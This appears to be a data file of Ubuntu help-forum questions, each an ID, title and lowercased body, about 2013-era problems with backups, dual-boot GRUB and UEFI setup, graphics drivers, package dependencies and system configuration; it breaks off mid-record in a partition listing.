252251	deja-dup backup failed - invalid data - sha 1 hash mismatch for file	on my most recent weekly backup today , deja-dup gave me this little love note : backup failed invalid data - sha1 hash mismatch for file : duplicity-inc.20130124t230054z.to.20130201t225108z.vol1.difftar.gpg calculated hash : 7726f55012e1e26cc762c9982e7c6c54ca7bb303 manifest hash : 205ecad0a91f8a11967b70d2d3fbc8e4d06231f5 i 'm running 12.10 and have been running weekly deja-dup backups since i installed it . i understand from reading other threads that this is a known software bug that happens when duplicity is interrupted , but most of those other threads are people trying to restore from these corrupted backups . i 've tried deleting and rm-ing the file in question to try again , but i get an error saying the file was n't found . my question is , what does this mean for my backups going forward ? did this week 's backup work ? will next week 's ? if not , how can i resolve this error ? i 'm not too concerned about the old versions of my files , and even if i need them in the future , i have some disk images saved which i could restore from . so should i just delete everything and start deja-dup from scratch ? any advice is appreciated .
252256	push contacts to google from local	i am able to synchronize thunderbird with my gmail contacts such that i can use all of my gmail contacts in thunderbird . i have made changes locally to my contacts locally in thunderbird . how can i export those changes to my gmail contacts ?
252258	how to set permissions to use jpilot and synchronize ?	the information and manuals are so bad that i had to discover that i need to sudo to execute pilot-xfer -p usb : -r < directory > successfully in order to restore a palm handheld connected to a usb port ( i do n't know which one and ca n't figure it out ) i also guessed ( because the info is terrible ) that i had to execute jpilot as root ( from the command line ) to be able to synchronize later on , from the jpilot gui . the problem is that some files are converted to be root files , others are n't , and i do n't like the idea of having to execute these things as root . so i would like to know which group to add my user to , or how to create one so that i can have permission to synchronize elegantly : with the minimum changes/effort .
252259	accidentally deleted ubuntu partition , windows 8 hibernated , can not access bios to boot from usb . help ?	i made a mistake i completely regret . after i deleted my ubuntu partition in windows 8 , my battery got too low and i lost power . i plugged in the cord and restarted the machine and was hit with a grub rescue screen . i tried rebooting with a ubuntu recovery usb , ( i do n't have a cd drive on the machine ) and it did n't work . i 've noticed after a few attempts to access my bios ( f7 ) that the text that states how to access bios has been replaced with `` resume from hibernation '' . i 'm stuck in a infinite loop . how can i resume hibernation into windows through grub recovery ? alternatively , how can i boot from the ubuntu usb drive from grub recovery ? thanks a million .
252260	what should i do to run after i have successfully installed touchegg on ubuntu 12.10 ?	i just have successfully installed touchegg and touchegg gui on my ubuntu 12.10 . but , right now i still ca n't use the multi touch gestures through touchegg . nothing happen when i use my three fingers or more on the touch pad . but , the 2 fingers scroll from ubuntu is still working well . i am able to use the touchegg gui configuration and set any kind of move that i want for my touch pad . but , it 's not working . so , what should i do to make the touchegg working ?
252261	how to configure bluetooth applet to start off or as the last state when logging in ?	every time i log in , bluetooth is on and i can not change this behavior from the bluetooth applet . is this a bad design or is there a reason why it is like this ? how can i change it ?
252264	change resolution when using screen sharing ?	i have a computer with ubuntu desktop running on a 1920x1080 screen . i need to screen-share into it with a computer using a 1680 resolution monitor . is there any way to get the screen sharing to resize the desktop so that it fits the screen i 'm using when screen-sharing into the computer ?
252267	where can i find ubuntu 's kernel source code ?	i heard that ubuntu is open source and that all its source code is available , but i have never seen its code . i want to start learning about ubuntu 's kernel and its complete working.please suggest me some reading from where i can start .
252275	ubuntu not loading from usb flash on hp netbook	trying to install ubuntu on a hp netbook mini 210-4150nr ( 1gb ram ) i have installed ubuntu 12.04 lts using unetbootin and usb installer on usb . changed the boot sequence in bios to load from the usb and it is recognising the usb . on starting it shows the following message and is stuck at a blinking underscore : syslinux 4.03 2010-10-22 edd copyright ( c ) 1994-2010 h. peter anvin et al based on various threads in this forum i tried formatting the usb flash drive as ntfs and installing and restarting but the bios did not recognise the same & went ahead to load windows . i tried downloading a fresh iso using the link from the usb installer app , but the same result . i tried the solution given at but to no avail - wont boot from usb , stops at syslinux copyright please help with installing ubuntu on my netbook . ( i am using a pny 8gb usb flash )
252276	ubuntu 12.04 ltib package issue	i tried to install the ltib package and the following errors were displayed : package minimum ver installed info -- -- -- - -- -- -- -- -- - -- -- -- -- -- -- -- - glibc-devel 0 not installed zlib 0 not installed died at ./ltib line 1397. traceback : main : :host_checks:1397 main:542 what should i do to resolve such errors ?
252277	why are the `` bash '' and the `` source '' commands behaving differently ?	i 'm using mac os 10.8 . i ran the /sw/fink/bin/init.sh script using the bash command which was supposed to make the fink/bin folder part of the $ path variable for the current session . the fink command did n't work , so i ran the script again with the . command which i was told was equivalent to the source command ; i was able to call fink now without an absolute path . why did . work and not bash ? is it because the sh and bash commands run with their own temporary $ path variable ?
252281	how do i take screenshots with a delay ?	while pressing prnt scrn mostly takes a screenshot there are times it does n't do as intended . the most common case is when a dropdown menu is active . how do i take such screenshots ? i want a solution that works with the default screenshot or screen capture tool that comes with my distro .
252284	problem after update driver in ubuntu 12.04 lts	i had installed ubuntu 12.04 lts on my laptop since last month and it work great and fine . but after i update my nvidia driver in ubunutu , the user-login interface had became cmd from gui . its fine but the problem is what should i input for the username part and also the password part ? i had tried many times to input my correct username and also password but it keep saying that my login password was wrong ! ! please help me ! ! image for my desktop interface after update my driver :
252292	ubuntu 12.04 lts got freezing while preparing to install	i 've downloaded via http ubuntu desktop iso and used a usb stick as per ubuntu instructions i 've done all and got it to the installation point and then preparing to install when i click continue it takes forever it 's not hanging whole computer i can still work on firefox without any problem but ubuntu preparing to install window freeze please help on this what can i do ? why is this freezing ?
252293	setting up dual-boot with windows 8 and ubuntu 12.10 screwed up grub	i recently purchased an acer aspire m5-581t that came with windows 8 preloaded . after several attempts at trying to install ubuntu 12.10 64-bit , i finally managed to boot from a liveusb and install it . however , due to windows finicky uefi setup , this did n't all go as planned . in order to boot from a liveusb , i entered my bios and changed the boot mode from uefi to legacy bios . this allowed me to change the boot order and properly install ubuntu 12.10 onto my partitioned drive . ubuntu was working fine , but when i rebooted , there was no grub menu asking whether i 'd like to load into windows or linux . it simply loaded me directly into linux as if windows was n't there . i figured it was due to my being in legacy bios boot mode , so i changed it back to uefi . then , only windows would load , with no menu for choosing ubuntu . in retrospect , i 'd have kept this over the disaster that is currently my computer . i went back into linux by switching into legacy bios again and install boot-repair . i ran it on the recommended settings , thinking it would install my much needed boot menu . it did n't . now , i ca n't get either os to load . when i reboot in uefi , i get errors stating : windows boot manager has been blocked by the current security policy and then hdd0 : has been blocked ... etc . i ca n't disable secure boot while still loading in uefi mode . booting in legacy bios leaves me in the grub rescue prompt with the error file '/boot/grub/i386-pc/normal.mod ' . prior to rebooting after running boot-repair , i was given the pastebin : paste.ubuntu.com/1618833 and was told that my .efi file was located in sda2/efi/ubuntu/grubx64.efi . i am becoming desperate . please advise me in loading into at least one of my operating systems ... note : i have read many of the similar posts , but none address the problem with necessary depth . most others ' problems were solved by boot-repair , not caused by it .
252296	is there a way to ignore checksum error ?	i have downloaded installer of mathematica from it 's website but checksum does not match and i ca n't install it . is there any way to ignore checksum and install it anyway ?
252300	how do i edit the commands that start a service in ubuntu 12 ?	so i am trying out gbrowse , as we will use this later on . but then , i 'm getting this -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- 256000 features loaded in 230.29s ( 1.19s/1000 features ) ... building object tree ... 6.78s.47s loading bulk data into database ... /tmp/feature.12240 dbd : :mysql : :db do failed : the used command is not allowed with this mysql version at /usr/local/share/perl/5.14.2/bio/db/seqfeature/store/dbi/mysql.pm line 571 , < gen0 > line 256232 . -- -- -- -- -- -- -- -- -- -- exception -- -- -- -- -- -- -- -- -- -- msg : the used command is not allowed with this mysql version stack bio : :db : :seqfeature : :store : :dbi : :mysql : :_finish_bulk_update /usr/local/share/perl/5.14.2/bio/db/seqfeature/store/dbi/mysql.pm:571 stack bio : :db : :seqfeature : :store : :finish_bulk_update /usr/local/share/perl/5.14.2/bio/db/seqfeature/store.pm:1505 stack bio : :db : :seqfeature : :store : :gff3loader : :finish_load /usr/local/share/perl/5.14.2/bio/db/seqfeature/store/gff3loader.pm:349 stack bio : :db : :seqfeature : :store : :loader : :load_fh /usr/local/share/perl/5.14.2/bio/db/seqfeature/store/loader.pm:354 stack bio : :db : :seqfeature : :store : :loader : :load /usr/local/share/perl/5.14.2/bio/db/seqfeature/store/loader.pm:243 stack toplevel bp_seqfeature_load.pl:103 -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- i 've tried doing what 's said here : http : //www.markhneedham.com/blog/2011/01/18/mysql-the-used-command-is-not-allowed-with-this-mysql-version/ , also in the part http : //dev.mysql.com/doc/refman/5.0/en/load-data-local.html if you use load data local in perl scripts or other programs that read the [ client ] group from option files , you can add the local-infile=1 option to that group . however , to keep this from causing problems for programs that do not understand local-infile , specify it using the loose- prefix : . so i 'm desperate now - is there such a thing in ubuntu ? because as i see it in windows , you can easily edit in the services snap-in viewer . what i intend to do is add the -- local-infile=1 parameter to the mysqld executable when the script/program that starts the mysql service is called .
252301	literally impossible to install ubuntu on win8 laptop	i have tried countless times to boot from a usb and also a disc ... secure boot is off , but still in uefi mode . please guide me.. i love the look ( i am using virtual box ) and i want to be able to dual boot . thanks
252306	cambria appears only in italics in libreoffice	i have a windows 7 partition mounted in ubuntu . in order to access the fonts i created a link to the windows font folder using ln -s /path/to/your/windows/fonts/folder .fonts/windows i then refreshed my font cache using sudo fc-cache -fv i only get cambria in italics in libreoffice . all the versions are available in gedit . is there a way to get the regular and bold versions too ?
252312	is it possible to call python functions from libre office calc ?	consider the following simple python function : def mysum ( a , b ) : return a + b i would like to put =mysum ( 5 , 7 ) in a cell of the calc spreadsheet , so that is simply returns the number 12 . is this possible ?
252313	upgrade from 9.04 to latest release	i 've already tried the steps outlined here upgrade from 9.04 to 12 to no avail , i get failed to fetch error for all packages , i 'd like to avoid having to purchase a set of discs to put an iso for the latest release on if possible , but if i have to i have to .
252315	aakkk ! 12.10 messed my display up ! help	okay so i had a pretty good set up going . i have a great machine , decided to take plunge and run linux as my primary os . totally loving it btw wish i had made the switch years ago . so i installed ubuntu , everything was great . i have a 3 monitor set up with a brand new ati firepro v7900 when i installed ubuntu , it picked everything right up no problem , displays were beautiful . i noticed just a little of lag and some very slight pixelation or artifacting so i decided to install the drivers to see if it would give me an edge . in hindsight , i should have never done it . i downloaded the ati/amd linux drivers for the card , installed the linux headers , rebooted , and bam , lost everything . no multiple monitors , super low resolution , and my launcher is nowhere to be found . i 'm stuck . the drivers made a backup of xorg.conf . i restored it , nothing . for what it 's worth , i wanted to try gnome-panel so i installed it just before i did the drivers . i noticed it was a little shaky so i do n't know what can be attributed to that and what issues are related to the driver install . first the launcher went , then the resolution and multiple displays on a subsequent reboot . found something online about downloading compiz manager to get the launcher back . think that made everything worse . i did too much at once , now i do n't know what caused what or even where to begin with fixing it . ahhh ! it was so sweet while it lasted . now i 'm busted , ca n't figure out what to do .
252317	every time i start mythbuntu the xfce menu shows , i have to restart mythtv to get it full screen	i 'm running an up-to-date ( i did an apt-get upgrade last night ) mythbuntu install ( myth 0.26 ) as a combined backend/frontend . every night i shut down the machine and turn it back on in the morning . i have no tuners only get-iplayer , miro-bridge and some hls tuners ( which do n't seem to work very well , but that 's another story ) so there 's no need for me to leave it on overnight unnecessarily . every morning when it starts up the mythtv frontend is displayed underneath the xfce menu/panel . i can ssh and kill mythfrontend for it to restart , i can go setup - > looks and just next my way through and then it will reload or i can delete a video ( movies rather than recording ) and press rescan and it will crash and reload ( why does it crash ? ) . all of those things fix it . also i occasionally get the screensaver coming on when it should n't , the same things fix that too . this seems to have happened since i upgraded from 12.04 to 12.10 , so is there something wrong with the startup of mythfrontend ? has it changed slightly ? hope someone can help !
252325	why do many gnome application packages depend on `libunity9` ?	when investigating this question , i discovered that many gnome applications ' packages depend on the libunity9 package . if i try to uninstall libunity9 on precise , it tries to uninstall lots of gnome applications : mijyn said in a comment , how could the ubuntu developers possibly think that would be a good idea ? ubuntu is starting to be more and more like windows : ( the libunity9 package is described as : binding to get places into the launcher - shared library libunity is a shared library to be able to interact with the launcher and add places in unity environment . this package contains shared libraries to be used by applications so obviously it 's a component of unity . it is odd that gnome applications depend on unity . since unity is an ubuntu-specific addition , upstream gnome apps should n't be depending on it . why these dependencies ?
252335	skype login problem	i have following strange problem under my ubuntu 12.04 . there is no possibility to start several skype instances . so i ran second skype with sudo /usr/bin/skype , logged to skype and used it without problems . but the next day when i tried to log into the second skype instance with the skype account that i have used yesterday , it showed an error message that i 've already used this account from this computer . i tried to start skype with sudo /usr/bin/skype and after this i logged with this account without a problem . but now it 's impossible to use this account directly without sudo command . how can i fix this issue ?
252340	how to fix apparmor `could not open` error when installing php+mysql ?	i want to install php5-imap php5-ldap php5-curl sudo apt-get install php5-imap php5-ldap php5-curl i get this error : apparmor parser error for /etc/apparmor.d/usr.sbin.mysqld in /etc/apparmor.d/usr.sbin.mysqld at line 9 : could not open 'abstractions/mysql' how can this problem be resolved ?
252342	unity gone after reboot..nvidia issue	first off , i am aware similar issues have been posted by others . i have exhausted the options i have found within those topics that i have found , and none have helped . i have tried things ranging from reinstalling compiz , making sure that it is in fact enabled by running ccsm blah blah blah . the following is where i am at -- -- - so i am a support tech for widnows based pc 's and trying to learn linux . i have windows 8 and ubuntu 12.10 dual booting in uefi on my asus g75-vw with the nvidia 660m . both boot fine . upon first boot of ubuntu after an install , the desktop is fine , resolution is at 1080p , but it says compiz unexpectedly quits repeatedly , although everything continues to work fine . after rebooting or shutting down , things go haywire . when trying to boot back into ubuntu 12.10 , i just get a all purple screen with some weird black fuzzy bars at the top . i got past this by booting to recovery , going to root terminal , and typing the following : rm -rfv ~/.compiz-1 rm -rfv ~/.config/compiz-1 reboot now this gets me back to the login screen but at a much reduced resolution and no unity . i can play around with the different drivers here by right clicking the desktop , hittng change background , hitting all settings , software sources , and then additional drivers , however all end up either the same or with just a black screen no mouse . the only way at this point i can get unity and 1080p back is too hit ctrl + alt + f1 and type : sudo apt-get purge nvidia* sudo reboot now at this point , compiz no longer crashes and all works great for my minimal purposes . however , thats a lot of work to do everytime i want to boot into ubuntu . when its working , additional drivers says it is using an alternative driver . all the other drivers fail and it always defaults to one of them on reboot . can anyone offer some suggestions ? it does n't seem like it is unity/compiz that is the issue as much as it is a driver problem , but i could very well be mistaken . when any of those drivers load i am stuck in low resolutions . perhaps a temporary solution if not a fix , possibly a way to keep it using the alternative driver if an nvidia one can not work ? thanks !
252343	is it wise to use an older version of ubuntu ?	i have an lg netbook ( xd170-l.adp4e8 ) with this features : -cpu : intel® atom™ cpu n455 @ 1.66ghz × 2 -video : mobile intel gma 3130 -memory : 1 gb ddr3 -hdd : 250 gb sata hdd i have both windows 7 and ubuntu 12.10 installed on it but it 's running ubuntu 12.10 very slow and i need to keep windows 7 installed . i tried lubuntu and xubuntu but i like ubuntu the most , so i 'm thinking about installing an older version of ubuntu . is this a good idea or there is something else i can do ? and what version of ubuntu should i install ?
252344	how can i install epson a3 printer and scanner drivers ?	i have 2 printers- samsung ml1676 and epson stylus 1390 ( a3 printer ) and 1 scanner epson gt1500 . i have installed samsung printer , but unable to install either of the epson product . the drivers does not install and show me dependency fails always . please , someone help me installing of locate the correct drivers . ubuntu version i am using is 12.10
252348	12.04 lts on vmware - will updates include unity 3d ?	unity 3d has problems with being a virtual machine ; without access to the graphics hardware it 's painfully slow . i 'm using the lts because the current release was slow beyond unusable . if i install all the updates , will this cause exactly the same problem on the lts as i had with the current version ?
252351	how to remove redmine from ubuntu 12.04	log : : /opt/maven $ sudo apt-get -f install redmine-sqlite reading package lists ... done building dependency tree reading state information ... done you might want to run 'apt-get -f install ' to correct these : the following packages have unmet dependencies : redmine-mysql : depends : redmine ( = 2.2.0+dfsg1-1~precise+1 ) but 2.1.4+dfsg2-2~precise+2 is to be installed redmine-sqlite : depends : ruby-sqlite3 but it is not going to be installed depends : redmine ( = 2.2.2+dfsg1-1~precise+1 ) but 2.1.4+dfsg2-2~precise+2 is to be installed e : unmet dependencies . try 'apt-get -f install ' with no packages ( or specify a solution ) . how do i remove redmine and others causing this problem .
252355	2 ubuntu in booting options and windows8 how to remove one ?	how to clean the booting options of my laptop since i am seeing windows 8 , ubuntu volume 2 and another ubuntu volume 2 ( that does n't exist ) since i made a new installation of the os again ? i do n't want to remove the both operating systems , what i want is to get rid of the other options of ubuntu on the list ( there is nothing in there when you click it says : insert disk or press enter to choose blah blah.. )
252356	installing any plugin ineclipse sticks on pending and does n't install	i am facing a problem with installing plugins in eclipse on ubuntu 12.04 . i am using the `` install new software '' feature under the help menu in eclipse . no matter what update site i provide in the `` work with '' text box , eclipse simply gets stuck on pending . there is no error message or error window that pops up . what have i tried so far : i have tried downloading different versions of eclipse but the problem seems to persist across all the versions . i have tried the direct and native active providers in the window- > preferences- > general- > network connections window . ( i have proxy settings configured in ubuntu which get used in eclipse when using the native active provider ) i was only able to get rid of the problem by connecting to another network through vpn and then choosing the direct active provider . connecting to another network through vpn seems to be a workaround . is there a solution that will let me install plugins in eclipse through the `` install new software '' feature without the need to connect to another network ?
252361	how could i mount an ext4 partition and have write permission ?	i 've set the /etc/fstab file so that i can mount an ext4 partition on startup and i did it with the following options : rw , auto , nouser , exec , sync . the problem is that i ca n't create or delete any file on that partition without using sudo , which i find even more puzzling because i 've mounted an ntfs partition ( with these options : rw , auto , user , noexec , sync ) and i did n't get the same problem i can read and write on the ntfs partition without using sudo . how could i mount an ext4 partition and have read/write permissions on it ?
252365	usb barcode scanner reading incorrect values	we use an barcode reader . it runs on ubuntu but reads different character . example : in barcode : 86912464 ubuntu read as : 3~3~bdbcd here is my xinput list ali @ ali-samsung : ~ $ xinput list ⎡ virtual core pointer id=2 [ master pointer ( 3 ) ] ⎜ ↳ virtual core xtest pointer id=4 [ slave pointer ( 2 ) ] ⎜ ↳ etps/2 elantech touchpad id=14 [ slave pointer ( 2 ) ] ⎣ virtual core keyboard id=3 [ master keyboard ( 2 ) ] ↳ virtual core xtest keyboard id=5 [ slave keyboard ( 3 ) ] ↳ power button id=6 [ slave keyboard ( 3 ) ] ↳ video bus id=7 [ slave keyboard ( 3 ) ] ↳ video bus id=8 [ slave keyboard ( 3 ) ] ↳ power button id=9 [ slave keyboard ( 3 ) ] ↳ webcam sc-13hdl12131n id=12 [ slave keyboard ( 3 ) ] ↳ at translated set 2 keyboard id=13 [ slave keyboard ( 3 ) ] ↳ scantech-id bv scantech-id bv mica scanner keyboard emulation id=10 [ slave keyboard ( 3 ) ]
252370	'the authentication failed ' error in ubuntu one using 12.04	i had a computer with 12.04 that ubuntu one was working seamlessly . but i had to reinstall it in another computer ( a brand new computer i 've received at work ) . since then ubuntu one is not authenticating anymore . bu the way , my password is right since i able to authenticate using ubuntu one/sso website . i 've installed ubuntu 12.04 i386 and upgraded it . i 'm using a proxy , so i also installed ubuntuone-client-proxy . of course i 've configured the proxy at network- > proxy . how can i debug `` ubuntuone-control-panel-qt '' behavior ? looking at my proxy , there 's no attempt to a http negotiation to some ubuntu one servers and looking the output of 'netstat -nt ' there 's no attempt no a tcp connection to a foreign server . seems to be something local . i 've already did what faq suggests : sudo apt-get install -- reinstall ca-certificates and restart . no success . packages installed : ubuntuone-client 3.0.2-0ubuntu1 ubuntuone-client-gnome 3.0.1-0ubuntu1 ubuntuone-client-proxy 3.0.2-0ubuntu1 ubuntuone-control-panel 3.0.1-0ubuntu1 ubuntuone-control-panel-common 3.0.1-0ubuntu1 ubuntuone-control-panel-qt 3.0.1-0ubuntu1 ubuntuone-installer 3.0.2-0ubuntu1.1 gir1.2-ubuntuoneui-3.0 3.0.1-0ubuntu1 libubuntuoneui-3.0-1 3.0.1-0ubuntu1 python-ubuntuone-client 3.0.2-0ubuntu1 python-ubuntuone-control-panel 3.0.1-0ubuntu1 python-ubuntuone-storageprotocol 3.0.2-0ubuntu1 rhythmbox-ubuntuone 3.0.0-0ubuntu1 i 'd appreciate some help how can i debug it . regards
252372	installation problem ms office 2013 using wine	i try to install ms office 2013 in ubuntu 12.10 using wine . but it says : error : newer windows version needed . how can i fix this error .
252376	how to clear fsck on next reboot flag	this morning i logged into my ubuntu 12.04 system ( workstation ) using ssh . i got this message : *** /dev/sda1 will be checked for errors at next reboot *** here is the df ics @ steamboy : ~ $ df filesystem 1k-blocks used available use % mounted on /dev/sda1 471081708 84066564 363085528 19 % / udev 2046160 4 2046156 1 % /dev tmpfs 822540 1044 821496 1 % /run none 5120 0 5120 0 % /run/lock none 2056344 168 2056176 1 % /run/shm /dev/sdb1 228917696 21409248 195298648 10 % /media/xtra i 've rebooted once , and fsck ran , but i got the same `` will be checked '' message upon logging in . i entered sudo touch /forcefsck , rebooted again , the system ran a much longer fsck on three partitions , but , upon logging in again ( using ssh ) , i got the same message . what can i do to clear this message ?
252380	i am being logged out when i start chromium browser ?	when i start chromium browser i get logged out and i get the startup screen . how can i check what causes this ? i have tried re-installing chromium but that did not work .
252383	ubuntu 12.10 curl with proxy	i´m using proxy and don´t have problems with anything except curl . anytime i try to do : curl -l http : //link.to.something i receive : curl : ( 5 ) could n't resolve proxy 'http' nevertheless : curl -- proxy http : //myproxy.com:8080 -l http : //link.to.something will work good . is there any solution for not writing -- proxy everytime ?
252393	prevent/stop/disable automatic updates on ubuntu desktop ?	i 'm using lucid , and i have this in ( system/administration/update manager ) : ... that is , apparently i have turned off automatic updates . however , occasionally , when i listen to music , i can hear it interrupt and i can see intense hard disk activity ; usually when it stops , i get a new icon in the toolbar , with an exclamation mark : if i right-click this icon , and click preferences , i 'm taken again to update manager , just on the first tab . thus , even if i have disabled automatic updates , automatic updates still run ? how do i get automatic updates to be disabled completely ? ?
252401	installing programs to livecd/usb ?	i want to have an ubuntu livecd or liveusb with a program ( cisco packet tracer ) installed on it thatâs always there every time i boot . anyone knows how to do this ? ( preferably as an image as i want this on several usb-sticks , but maybe i can also do some kind of clone if i succeed on one . ) thanks ! magnus
252402	further information on the ubuntu phone sdk	we saw many threads on the ubuntu user interface toolkit that will be available for the ubuntu phone application development ( see this thread for example ) . but there seems to be no information about other really important parts of the sdk . furthermore it 's really hard to continuative information using other information channels . the offical # ubuntu-phone channel at freenode.net is not yet frequently used , developer.ubuntu.com just targets the ui part of the sdk and the mailinglist of the ubuntu-phone group at launchpad.net also offers just insufficient information . i would like to know something about the following topics . data which possibilities will i have to store data ? what is the standard database used for development ( sqlite for example ) ? how could i store preferences ? will there be a preference-api like the one of android ? what 's about global interfaces to access phone data like contacts , calls , sms and calendars . internal communication what sort of internal communication could we expect ? how could we use foreign and system applications to send emails or open websites ... ? is there a broadcast service to be responsive to system events like a completed bootup , an incoming sms or a request to start any app that could handle some kind of data ? also see this question regarding this topic . sensors what 's about sensor api 's ? which possiblities will i have to interface with the camera ( s ) , acceleration , orientation , distance or gps sensors ? environment an api to access information regarding the phone environment will certainly be there , but what will it be capable of ? how would i be able to access the os version , the screen resolution , the available sensors , the phone leds and the filesystem ? threading will there be special implementations that simplify the usage of threads ? how could i solve problems of concurrency and what kind of intercommunication will be available ? testing testing is a important part of application development but i did n't see any information about unit testing , a mocking framework or the emulator , which was mentioned in some threads . will the emulator be capable of sensor emulation , will there be a plugin to integrate the testing framework and the emulator into qtcreator ? many questions but i hope that some of the developers will see this thread and answer some of them .
252405	ubuntu-server first start	how do you change network settings ? ifconfig gives ip 192.168.122.1 ( i ping it and the ethernet card works ) i use sudo vi /etc/network/interfeces then after editing auto eth0 ifaces eth0 inet dhcp i can not save it . how to save settings ?
252406	erased root trash but still getting no memory	i was coding my site on apache server . suddenly an error came and i got the warning this computer has only 1.3 gb remaining . i knew that this was because of the log file in /var/log/apache2/subins/error.log . i opened the folder in root and the file size of the log was 17 gb . i deleted the error file . i went on to the root trash folder to delete the log file permanently . i deleted the files and info folder in the 'root trash ' folder . so i had erased the root trash folder . but things got wrong . i still get the warning this computer has only 1.3 gb remaining i think i did the wrong way to empty root trash . i used disk usage analyzer to find the log file to permanently delete . but the software did n't showed the file . what happened to the folder i deleted in 'root trash ' ? here 's the screenshot of disk usage analyzer after the search . update : now my computer memory is 1 kb after i run the web page again in which the error showed . output of df -t -h : filesystem type size used avail use % mounted on /dev/sda7 ext4 40g 38g 21k 100 % / none devtmpfs 455m 291k 455m 1 % /dev none tmpfs 460m 3.4m 456m 1 % /dev/shm none tmpfs 460m 312k 459m 1 % /var/run
252410	how do i get back the ambiance theme for gtk ?	i tried out the new kubuntu-desktop . all applications integrated nicely in kde , thanks to oxygen-gtk . however , after logging out and logging in into the standard unity desktop , gtk applications like firefox , thunderbird , gimp etc still show up styled with oxygen , although with the standard icons . how do i get my ambiance theme for those programmes back ?
252414	i ca n't see my partitions to install ubuntu	i want to install ubuntu 12.04 on my pc . it already has windows 7 on it . i wan na use both as a dual boot pc . my hdd is 1tb & it has 4 partitions in windows . but when i try to install ubuntu i cant see those partitions . i can only see the whole hdd as a single partition . how can i fix it ? please help .
252420	is there any way i can transfer tools from backtrack 5 r3 to ubuntu 12.04 ?	just curious ! if there is any way i can do that without downloading something .
252422	doing an unattended pxe installation from a local nfs volume ?	i 'm trying to configure unattended ubuntu desktop ( 12.10 ) installations booting from pxe . i 've got it working , but since i had to use the initrd.gz and kernel from the mini iso , it appears only to be able to install from an http repository . i 'm using kickstart and preseed to do the actual install , and as i said it does work , but it takes a long time since it has to download all the packages . i have the full 12.10 iso and i 'd like to be able to pxe boot and do an unattended installation ( with custom partitioning scheme ) using the packages from the installation cd ( i.e. , not a remote mirror ) . i looked in the install image and saw that everything 's in a single squashfs file , so i mounted that but have no idea if it 's possible to use the files inside that to do the install . it looks like one solution is to use apt-mirror to setup a full repository mirror , and then configure preseed to use the local repository for the install . this seems pretty straightforward , but requires setting up a 100 gig repository , when all the files i want for the base install are on an 800 mb iso already . i have a second pxe option which just mimics booting from the ubuntu cd . it drops you to the desktop , and you double-click the `` install ubuntu '' icon and go through the whole procedure . this works but is n't unattended . so to summarize , i want to netboot do an unattended ( no prompts ) installation with custom partitioning scheme perform the installation using only resources on my lan not setup a full 50-100 gig ubuntu repo mirror is this possible ?
252425	upgrade to 12.04 did not seem to work , can i restore back to 10.04 as i was , am stuck at grub prompt ?	is it possible to restore my dual boot pc to 10.04 lts ? i am concerned about rescuing my data if the upgrade to 12.04 has not worked . what options do i have from the grub prompt ?
252429	software or applet to check if a server is up	i 'm looking for a software which can tell me if a server is up or down . typically i need that the software call a specific url every 2 seconds and check the content of the response . if content match , green indicator , if not red indicator . simple , does it exist ?
252433	computer gave up on life after restart	i am using ubuntu for a while and i do n't have internet connection . so i got installed no updates recently . from few days its behaving strangely.i am not sure what actually cause this , either due to no updates or some messup happen inside . when i have started my pc its starting with bunch of code flow and then this the last line where its stopping & several restarts done with negative . [ 16.0634321 ] cr2 : fffffffffffffff8 help me to solve this.thank you .
252435	what ca n't i install ncurses-dev in ubuntu 12.10 ?	when i run the command : apt-get install kernel-package ncurses-dev bzip2 i get the following output : reading package lists ... done building dependency tree reading state information ... done note , selecting 'libncurses5-dev ' instead of 'ncurses-dev' bzip2 is already the newest version . some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : kernel-package : depends : build-essential but it is not going to be installed libncurses5-dev : depends : libtinfo5 ( = 5.9-10 ) but 5.9-10ubuntu1 is to be installed depends : libncurses5 ( = 5.9-10 ) but 5.9-10ubuntu1 is to be installed depends : libtinfo-dev ( = 5.9-10 ) but it is not going to be installed depends : ncurses-bin ( = 5.9-10 ) but 5.9-10ubuntu1 is to be installed e : unable to correct problems , you have held broken packages .
252436	how to prevent automatic apt-get operations from running for a while ?	in a production context , we run scripts to configure/customize the os . it makes intensive use of apt-get ( to install , remove , update , upgrade packages ) . unfortunately it happens ( especially just after system boot ) that another process starts to do things in background and locks the dpkg status database . it gives the following error : dpkg : error : dpkg status database is locked by another process e : sub-process /usr/bin/dpkg returned an error code ( 2 ) for an end-user this is probably strange but not a big problem since they can just try again a few seconds later . but for instructions in a script .this is very annoying . my first guess is about some cron/anacron jobs to check package updates . is there a way to prevent such jobs from running during that time ? thanks
252437	ubuntu one does not show my photo album	ubuntu one photo sharing tab does not show my new album that i want to share , why ?
252441	what does this error message mean ?	i get this a lot when working in python , at seemingly random times when running my program . assertion 't = find_next_time_event ( m ) ' failed at pulse/mainloop.c:741 , function calc_next_timeout ( ) . aborting . aborted ( core dumped ) what does it mean , and how can i maybe avoid it ?
252446	why does ubuntu 12.10 not detect my win7 partition ?	i 'm trying to install ubuntu 12.10 alongside windows 7 on my asus laptop and i 'm new to all of this . i 'm using the ubuntu 12.10 64-bit iso burned onto a cd . the first time i tried to install it , ubuntu said it did not detect any other os , which meant i only had 4 options : erase disk and install ubuntu ( i do n't want to do this ) encrypt new ubuntu . use lvm . something else . if i choose the something else option , it brings me to the partition menu and says that i have 1 disk with free space of 750516mb ( 750gb ) , but that 's not true because i have windows 7 . i 've already read through several questions and people have mentioned that you could only have 4 primary partitions . so i got hold of partition magic and removed my d : and e : , leaving me with primary c : partition and system reserved partition and a lot of unallocated space . i restarted the laptop several times and booted the cd again and i got exactly the same as i did previously . how do fix this problem and install ubuntu alongside windows 7 ? edit 1 here are my results for sudo fdisk -l ; echo ; sudo parted -l ; echo ; mount ; echo ; df -h warning : gpt ( guid partition table ) detected on '/dev/sda ' ! the util fdisk does n't support gpt . use gnu parted . disk /dev/sda : 750.2 gb , 750156374016 bytes 255 heads , 63 sectors/track , 91201 cylinders , total 1465149168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 4096 bytes i/o size ( minimum/optimal ) : 4096 bytes / 4096 bytes disk identifier : 0x90050371 device boot start end blocks id system /dev/sda1 * 2048 206847 102400 7 hpfs/ntfs/exfat /dev/sda2 206848 146368214 73080683+ 